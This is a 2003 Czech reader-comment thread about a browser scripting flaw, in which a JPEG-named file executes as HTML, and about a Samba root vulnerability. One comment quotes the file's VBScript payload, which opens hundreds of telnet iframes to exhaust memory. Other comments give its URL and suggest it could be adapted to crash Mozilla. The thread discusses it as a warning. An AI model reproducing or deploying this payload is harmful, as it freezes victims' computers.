Chyba ve skriptech u Windows zase otevírá pole pro červíky

Diskuze čtenářů k článku

Kamil  |  21. 03. 2003 14:09
jp  |  21. 03. 2003 14:24

tak to je husty :)

Souhlasím  |  Nesouhlasím  |  Odpovědět
lukas  |  21. 03. 2003 14:25

Nojo, aby se zas nekdo nenasel. Co k tomu napsat aspon varovani? <br> Neklikejte na ten odkaz, pokud si nejste jisti co delate, s nekterymi prohlizeci zpusobi zamrznuti systemu.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  21. 03. 2003 14:31

To není žádní chyba ve skriptech, ale nasere to. Neklikejte na to, otevře to 12000 telnetů na microsoft.com. dost na to, aby se vám zaplnila paměť a počítač byl nepoužitelný.

je tam 15x toto:

<script type="text/vbscript">
for a=1 to 800
document.write("<iframe src=" + chr(34) + "telnet://www.microsoft.com:80" + chr(34) + ">")
next
</script>

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jirka  |  21. 03. 2003 15:33

To je pravda, chyba neni ve skriptech. Chyba je uz v tom, ze dokument typu "image/jpeg" je spusten a ne zobrazen.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  21. 03. 2003 15:38

Ne, soubory nejsou rozlišovány podle přípony, ale podle Mime typu. ASP stránka tak může být obrázek, JPG může být naopak kód. jak si myslíte že funguje třeba takové Navrcholu? je tam odkaz jakoby na obrázek, za kterým se ale schovává kód. použití JPG pro kód je jen záměrně matoucí, mate to ale uživatele. prohlížeči je jedno, jak se to jmenuje, důležitější je pro něj skutečný typ souboru.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jirka  |  21. 03. 2003 16:32

Nevim co Vam, ale me server jako typ souboru vrati "image/jpeg". Zkuste si "wget -s http://source.lv/woid.jpg" a podivejte se co budete mit ve stazene hlavicce.
IE & spol. se buhuzel casto snazi byt chytrejsi nez je vhodne a tak analyzuje stazena data, nekouka na typ dat a dela s nima to co se mu zlibi. Spravne by mel v tomto pripade poznat, ze stazena data neodpovidaji uvedenemu typu a nedelat nic.

Souhlasím  |  Nesouhlasím  |  Odpovědět
ja  |  21. 03. 2003 16:50

[ja@pocitac adresar]$ wget http://source.lv/woid.jpg
--16:48:38-- http://source.lv/woid.jpg
=> `woid.jpg'
Resolving source.lv... done.
Connecting to source.lv[159.148.96.252]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,339 [<b>image/jpeg</b>]

Takze zrovna v tomto pripade je to problem, ze sa spusti obrazok. Mimochodom, mozilla vypise ze obrazok obsahuje chyby a neda sa zobrazit.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jaja  |  21. 03. 2003 17:27

The image “http://source.lv/woid.jpg” cannot be displayed, because it contains errors.
By MozillaB

Souhlasím  |  Nesouhlasím  |  Odpovědět
shrek  |  21. 03. 2003 19:17

Jak jste na to prisel? Navrcholu samozrejme posila obrazek - konkretne pruhledny GIF o rozmerech 1x1. K nemu dostane prohlizec cookie, cimz se castecne eliminuje vicenasobne pricitani pri opetovnem nahravani stranky tim samym uzivatelem. Pane Holciku, April je jeste daleko...

Souhlasím  |  Nesouhlasím  |  Odpovědět
shrek  |  21. 03. 2003 19:24

Jinak ale mate pravdu, ze se na strane serveru spusti skript. To je ale trosku neco jineho - z vaseho prispevku mi vyplynulo, ze se misto obrazku spusti skript v browseru (zadny z browseru, ktere znam, neumi interpretovat Perl ani ASP).

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  23. 03. 2003 21:15

Nikde jsem neřekl, že navrcholu neposílá obrázek, vyžádáte si obrázek, spustí se kód (úplně jedno jestli ASP, či jiný) ten zpracuje info a na závěr pro korektnost nastaví content type na obrázek a pošle pár bajtů pro průhledný gif.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Roj  |  22. 03. 2003 09:11

Moje mozillka pro W98 mi tam akorat rekla, ze to nemuze zobrazit, protoze je v tom chyba. Jinak ani nezamrzla, ani nic nespustila, ani mi nezezloutly zaclony!
Ale to byste museli mit mozilku, pak byste se nemuseli bat surfovat a mejlovat

Souhlasím  |  Nesouhlasím  |  Odpovědět
Jerry III  |  21. 03. 2003 18:36

Pokud to clovek trosku modifikuje (uzavre ten iframe a napise to v JavaScriptu) a posle ten jpeg jako text/html tak to slozi i Mozillu. Nevim co na tom tak vidite, jedine snad to, ze IE se snazi image/jpeg interpretovat jako HTML coz je imho anachronismus z dob kdy lidi byli prasata a neposilali spravnej Content-Type. Na druhou stranu spousta lidi ho neposila spravne dodnes.

Souhlasím  |  Nesouhlasím  |  Odpovědět
otec_fura  |  21. 03. 2003 00:31

No ja si myslím že tu trochu rozdíl je, chyba ve Win je v systému, ta co zmiňuješ je v Sambě což je program pro Linux. Nepletu-li se tak si Sambu instalovat nemusiš.

Souhlasím  |  Nesouhlasím  |  Odpovědět
r  |  21. 03. 2003 07:55

http://marc.theaimsgroup.com/?l=linux-kernel&m=104791735604202&w=2
http://www.underground.cz/article.php?id_article=852

Souhlasím  |  Nesouhlasím  |  Odpovědět
ss  |  21. 03. 2003 13:41

Tak se predved, jak tohle udelas vzdalene. Samozrejme to je velka chyba, ale zneuzitelna je jen lokalne.

Souhlasím  |  Nesouhlasím  |  Odpovědět
_  |  21. 03. 2003 17:01

No, pokud admin toho serveru zapomene userum vzit shell, tak by to snad mohlo jit, ne ?

Souhlasím  |  Nesouhlasím  |  Odpovědět
MA  |  20. 03. 2003 23:17

Co takhle zminit se o chybe v Sambe pro Linux? Tato chyba ma take atributy zneuzitelne cervy. Ale ja vim.... tohle je prece nezajimave tema ze?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Honza  |  20. 03. 2003 23:25

Ta Samba me zajima, mas k tomu nejake podrobnejsi info?

Souhlasím  |  Nesouhlasím  |  Odpovědět
Ales  |  21. 03. 2003 08:10

upgraduj na Sambu 2.2.8 viz samba.org

Souhlasím  |  Nesouhlasím  |  Odpovědět
Petr Mach  |  21. 03. 2003 01:21

Rozdil je v tom, ze chyba v Sambe se tyka adminu, ne uzivatelu, kdezto tohle je chyba, ktere se musi venovat uzivatele a proto je nutno je informovat na uzivatelskem webu. Admini ctou jine weby a tam so o sambe zajiste dozvedeli.

Souhlasím  |  Nesouhlasím  |  Odpovědět
MA  |  21. 03. 2003 13:45

Omyl chyba v Sambe je take vec uzivatelu. Znam plno beznych uzivatelu Linuxu, kteri pouzivaji Sambu, aby meli "pristup" site MS.

Souhlasím  |  Nesouhlasím  |  Odpovědět
ZEr  |  21. 03. 2003 07:05

typicka slova winlammeru

takovato chyba nejde omezit v zadnem systemu (kdyz si uzivatel spusti skript tak to udela co je v nem napsane na urovni prav uzivatele) jen nezbyva nez vypnout automaticke spousteni takovychto sracek

Souhlasím  |  Nesouhlasím  |  Odpovědět
Bohuslav Roztočil  |  21. 03. 2003 07:21

Říkáš tomu "sračka", protože jsou v tom chyby. Samo o jde o přínosnou vlastnost, jen kdyby to někdo - po těch letech - už dokázal naimplementovat bezpečně.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Tomáš Holčík  |  21. 03. 2003 11:01

ta chyba je obtížně zneužitelná přes internet, protože už v základu se velmi nedoporučuje mít Sambu otevřenou přes internet kvůli problémům v implementaci, není to prostě bráno jako implicitně bezpečné. spíše je to tedy zneužitelné v lokálních sítích a admini se o tom dozví. tato chyba ve skriptech se týká běžných uživatelů a je poměrně kritická.

Souhlasím  |  Nesouhlasím  |  Odpovědět
MA  |  21. 03. 2003 13:43

Nesouhlasim s Vami. Jiz si presne nepamatuji ceho se chyba v Sambe tykala ale mam pocit ze se jednalo o buffer overrun. Tato chyba umoznuje spustit libovolny kod s privilegii roota. Nema prece smysl rikat ze neni z neuzitelna z Internetu. Je stejne zneuzitelna jako ta pro Win.

Co kdyz si nekdo stahne ze stranek cervika, ktery bude tuto chybu vyuzivat a na Linuxu mu takto spusti treba trojskeho kone? Tohle snad neni zavazne?

Souhlasím  |  Nesouhlasím  |  Odpovědět
sss  |  21. 03. 2003 22:26

neplette se m roota -samba pokud vim tak v distru ,ktere mam nainstalovanem ,tak nebezi pod rootem ,takze max ziska uzivatele pod kterym bezi - ale tohle je nesmycslne prirovnani ,protoze ani bezny uzivatel linuxu si neexportu je disky prez sambu - a navic samba je neco co si do systemu umyslne pridavate - vubec to tam byt nemusi...

Souhlasím  |  Nesouhlasím  |  Odpovědět
MJ  |  22. 03. 2003 09:07

Omyl pravdu mam ja:

citace z root.cz: "

Všechny verze Samby nižší než 2.2.8 obsahují závažnou bezpečnostní chybu umožňující vzdálenému útočníkovi získat rootovská oprávnění. Upgrade na nejnovější verzi 2.2.8 je důrazně doporučovan. (Upozornil harry_x)
mik"
 
A to ze Samba nemusi byt implicitne nastavena je jedno, protoze jak uz jsem tu psal vyse spousta uzivatelu ji instaluje k vuli pristupu MS siti.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Roj  |  22. 03. 2003 09:13

To nic nemeni na tom, ze SAMBA JE SERVER. A administrovat server nemuze kdejaky tupoun a widlovej klikac. A o te chybe kazdy vi.

Souhlasím  |  Nesouhlasím  |  Odpovědět
MJ  |  22. 03. 2003 09:44

Aha jsem rad ze si myslis ze o ni kazdy vi? Jak je mozne ze znam minimalne mnoho lidi, kteri o tom nevedi a stale pouzivaji zranitelnou Sambu.

A opravdu me uz bavi to, ze Samba je server a nemuze ji spravovat kazdy? A co je teda potom prima soucast Linuxu? Jen Kernel? S tim si ale asi moc nikdo nevystaci.

Proste priznej ze tato chyba ma jeste vyssi uroven nez ta co je tu pro Win, protoze ta dovoli spustit kod jen s privilegii prihlaseneho uzivatele, tady to konci pravy roota.

Souhlasím  |  Nesouhlasím  |  Odpovědět
MJ  |  22. 03. 2003 09:48

Jeste dodatek, myslis si ze snad Windows 2000 Server, muze spravovat kdejakej tupoun? Asi si tyto systemy nevidel a zustal si trcet s Win 98. To uz vubec nemluvim o Windows 2003 Server, mel jsem moznost videt Betu.

Souhlasím  |  Nesouhlasím  |  Odpovědět
Roj  |  23. 03. 2003 08:57

Ale Samba je server, ma to dokonce i v nazvu Pouzivas-li PC jako desktopovou stanici a pripojenim na internet, nemusis Sambu vubec instalovat. Zato jscript mas nainstalovanej vzdy, pokud nejsi natolik dobrej, ze si ho vypnes.
Samba se defaultne spousti pod uzivatelem Samba.
Zive je platek pro BFU, proto se zabyva chybami, ktery jsou nebezpacny BFU. Admini ctou stranky, kterym bys mozna ani nerozumel A tam se o Sambe docetli minuly tyden.
W 2003 opravdu mit nebudu, zaplatpambu

Souhlasím  |  Nesouhlasím  |  Odpovědět
Zasílat názory e-mailem: Zasílat názory Můj názor